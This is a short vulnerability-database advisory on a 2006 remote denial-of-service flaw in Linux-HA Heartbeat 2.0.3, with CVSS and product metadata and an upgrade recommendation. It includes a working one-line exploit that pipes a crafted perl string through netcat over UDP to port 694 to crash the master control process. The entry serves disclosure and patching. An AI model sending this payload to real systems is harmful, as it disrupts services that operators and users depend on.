vendor:
Heartbeat
by:
SecurityFocus
5
CVSS
MEDIUM
Remote Denial-of-Service
399
CWE
Product Name: Heartbeat
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: Yes
Related CWE: N/A
CPE: a:linux-ha:heartbeat
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006
Linux-HA Heartbeat Remote Denial-of-Service Vulnerability
Linux-HA Heartbeat is prone to a remote denial-of-service vulnerability. By successfully exploiting this issue, attackers can crash the master control process. This may result in the failure of services that depend on the application's functionality. An example exploit is provided: perl -e 'print "###2147483647heart attack:%%%"' | nc -u 192.168.1.12 694
Mitigation:
Upgrade to the latest version of Linux-HA Heartbeat